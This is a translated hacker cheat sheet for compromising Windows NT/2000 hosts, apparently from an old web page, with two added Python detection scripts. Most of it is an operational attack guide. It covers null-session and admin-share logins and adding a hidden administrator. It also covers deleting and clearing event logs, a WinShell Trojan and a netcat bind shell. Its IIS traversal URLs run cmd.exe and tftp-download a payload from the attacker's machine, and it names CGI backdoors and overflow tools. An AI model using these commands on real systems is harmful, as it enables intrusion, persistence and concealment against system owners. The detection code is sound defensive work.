Commands that both administrators and hackers must know
Commonly used net commands:
(establish a null-session connection with the remote host) net use \\<IP address>\ipc$ "" /user:""
(log in to the remote host as an administrator) net use \\<IP address>\ipc$ "password" /user:"Administrator"
(copy a file to the remote host's Winnt directory) copy <local path>\<program> \\<IP address>\admin$
(view the remote host's time) net time \\<IP address>
(start a program at a given time) at \\<IP address> 02:18 Readme.exe
(view shares) net view \\<IP address>
(view the remote host's NetBIOS name table) nbtstat -a <IP address>
(map the remote host's C drive to local drive F) net use F: \\<IP address>\c$ "" /user:"Administrator"
(these two add a user and put it in the Administrators group) net user <username> <password> /add
net localgroup Administrators <username> /add
(disconnect) net use \\<IP address>\ipc$ /delete
Deleting the log files on the host:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
1. netsvc.exe
The following commands list the services on the host, query the state of the Schedule (Task Scheduler) service, and start that service remotely:
netsvc /list \\<IP address>
netsvc schedule \\<IP address> /query
netsvc schedule \\<IP address> /start
2. opentelnet.exe
Remotely starts the host's Telnet service and binds it to port 7878, for example:
opentelnet \\<IP address> <username> <password> 1 7878
You can then telnet to port 7878 of the host and get a command prompt:
telnet <IP address> 7878
3. winshell.exe
A very small Trojan (under 6 KB). Telnet to port 7878 of the host, enter the password WinShell, and when the cmd> prompt appears you can enter the following commands:
p Path (show the path of the WinShell main program)
b reBoot (reboot the machine)
d ShutDown (shut down the machine)
s Shell (after execution you get the familiar "c:\>" prompt)
x eXit (end this logon session; this command does not terminate WinShell itself)
cmd> http://.../srv.exe (download a file over HTTP from another site onto the machine running WinShell)
4. 3389 login client (Remote Desktop), a GUI way to log in to the remote host
5. elsave.exe
Event log cleanup tool:
elsave -s \\<IP address> -l "Application" -C
elsave -s \\<IP address> -l "System" -C
elsave -s \\<IP address> -l "Security" -C
After execution the Application, System and Security logs have been cleared.
6. hbulot.exe
Opens the 3389 (Terminal Services) service on Win2K Server and WinXP:
hbulot [/r]
Using /r means the target restarts automatically after the installation completes so that the setting takes effect.
7. nc.exe (netcat)
A good tool; some scripts depend on it, and it is also used for the connection after an overflow.
To connect somewhere: nc [-options] hostname port[s] [ports] ...
To bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]
Parameters:
-e prog   program to execute once connected [dangerous!!]
-g gateway   source-routing hop point[s], up to 8
-G num   source-routing pointer: 4, 8, 12, ...
-h   help
-i secs   delay interval between lines sent or ports scanned
-l   listen mode, for inbound connections
-n   numeric-only IP addresses, no DNS lookups (cannot be combined with a hostname)
-o file   hex dump of the traffic to file
-p port   local port number
-r   randomize local and remote ports
-s addr   local source address
-u   UDP mode
-v   verbose output (use -v twice for more detail)
-w secs   timeout for connects and final net reads
-z   zero-I/O mode (used for scanning)
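As an added detection example (not part of the original page), the following Python checks process-creation command lines against the command patterns listed above (null-session net use, admin-share mount, account creation, remote at job, log deletion, elsave -C, netcat bind shell). The sample command lines are constructed and the rule names are my own.

```python
import re

# Constructed process-creation command lines (e.g. from an EDR or Sysmon feed).
SAMPLE_CMDLINES = [
    r'net  use \\10.0.0.5\ipc$ "" /user:""',
    r'net use F: \\10.0.0.5\c$ "" /user:"Administrator"',
    r'net user backup Pa55w0rd /add',
    r'net localgroup Administrators backup /add',
    r'at \\10.0.0.5 02:18 Readme.exe',
    r'del C:\winnt\system32\logfiles\*.*',
    r'del c:\winnt\system32\config\*.evt',
    r'elsave -s \\10.0.0.5 -l "security" -C',
    r'nc -l -p 7878 -e cmd.exe',
    r'notepad.exe C:\notes.txt',
]

# (rule name, regex) applied to the whitespace-normalised, lower-cased command line.
RULES = [
    ("null_session_ipc",  r'^net use \\\\\S+\\ipc\$ "" /user:""'),
    ("admin_share_mount", r'^net use \S+ \\\\\S+\\(c|admin)\$'),
    ("local_user_added",  r'^net user \S+ \S+ /add'),
    ("added_to_admins",   r'^net localgroup administrators \S+ /add'),
    ("remote_at_job",     r'^at \\\\\S+ \d\d:\d\d '),
    ("log_files_deleted", r'^del .*\\(logfiles\\|config\\\*\.evt|\*\.log)'),
    ("eventlog_cleared",  r'^elsave\b.*\s-c\b'),
    ("netcat_bind_shell", r'^nc(\.exe)? .*-l .*-e \S+'),
]

def normalize(cmdline):
    """Collapse repeated whitespace and lower-case so the rules stay simple."""
    return " ".join(cmdline.split()).lower()

def classify(cmdline):
    """Return the names of all rules the command line matches."""
    n = normalize(cmdline)
    return [name for name, pattern in RULES if re.search(pattern, n)]

def scan(cmdlines):
    """Map each suspicious command line to its matching rule names."""
    return {c: classify(c) for c in cmdlines if classify(c)}

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_CMDLINES).items():
        print(f"ALERT {', '.join(rules)}: {cmd}")
```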
8. tftpd32.exe
Temporarily turns your computer into a TFTP server so that the compromised host ("broiler") can download files from it. The tftp command is run on the compromised host, usually through the Unicode vulnerability or a Telnet session, for example:
http://<IP address>/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+tftp+-i+<your IP address>+get+<file name>+c:\winnt\system32\<file name>
You can then run the file directly:
http://<IP address>/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+<file name>
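As an added detection example (not part of the original page), the following Python parses constructed IIS W3C log lines, decodes double-encoded (%255c) and overlong UTF-8 path separators of the kind used in the requests above, and flags requests that traverse to cmd.exe, returning the decoded command passed after /c. The log lines are constructed samples.

```python
from urllib.parse import unquote

# Constructed sample IIS W3C log lines (not real traffic), fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-10-05 10:01:12 10.0.0.7 GET /default.htm - 200
2001-10-05 10:01:40 10.0.0.9 GET /scripts/..%255c..%255c/winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-10-05 10:02:03 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+get+srv.exe+c:\\winnt\\system32\\srv.exe 200
2001-10-05 10:02:30 10.0.0.11 GET /images/logo.gif - 304
"""

# Overlong UTF-8 encodings of '/' and '\' that the old IIS decoder accepted
# after its traversal check had already run.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}

def normalize_path(stem):
    """URL-decode until stable (so %255c -> %5c -> '\\'), map overlong
    separators to plain ones, and unify '\\' to '/'."""
    s = stem.lower()
    prev = None
    while s != prev:
        for enc, plain in OVERLONG.items():
            s = s.replace(enc, plain)
        prev, s = s, unquote(s)
    return s.replace("\\", "/")

def is_traversal_to_cmd(stem):
    """True when the decoded path climbs with '..' and ends at cmd.exe."""
    path = normalize_path(stem)
    return "/../" in path and path.endswith("/cmd.exe")

def scan_log(text):
    """Return (client IP, decoded command) for each traversal-to-cmd.exe hit."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if is_traversal_to_cmd(stem):
            hits.append((client_ip, unquote(query).replace("+", " ")))
    return hits

if __name__ == "__main__":
    for ip, cmd in scan_log(SAMPLE_LOG):
        print(f"ALERT traversal to cmd.exe from {ip}: {cmd}")
```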
9. prihack.exe is a remote buffer overflow tool for the IIS printer extension. idqover.exe exploits the IDQ overflow: select "listen on a port after the overflow", then connect to the listening port with Telnet; if the overflow succeeds, the bound command runs immediately. xploit.exe is a graphical front end for the IDA overflow; for WinXP targets, use its WinXP mode after success.
10. ntis.exe, cmd.exe and cmdasp.asp are three CGI backdoors: the .exe files go in the cgi-bin directory and the .asp file in a directory with execute permissions. Then connect to them with the IE browser.
11. Xscan command-line parameters:
During a scan, press [space] to view the status of each thread and the scan progress; press Q to save the current data and exit early.
-port: detect the status of common service ports (the port list can be set via the "port-scan-options\port-list" item in \dat\config.ini);
-ftp: detect weak FTP passwords (the username/password dictionary files can be set in \dat\config.ini);
-ntpass: detect weak NT server passwords (the username/password dictionary files can be set in \dat\config.ini);
-cgi: detect CGI vulnerabilities (the encoding scheme can be set via the "cgi-encode\encode_type" item in \dat\config.ini);
-iis: detect IIS vulnerabilities (the encoding scheme can be set via the "cgi-encode\encode_type" item in \dat\config.ini);
The other options have the following meanings:
-v: show detailed scan progress
-p: skip hosts that do not respond to ping
-o: skip hosts on which no open port is detected
-t <concurrent threads[,concurrent hosts]>: maximum number of concurrent threads and concurrent hosts; the defaults are 100 and 10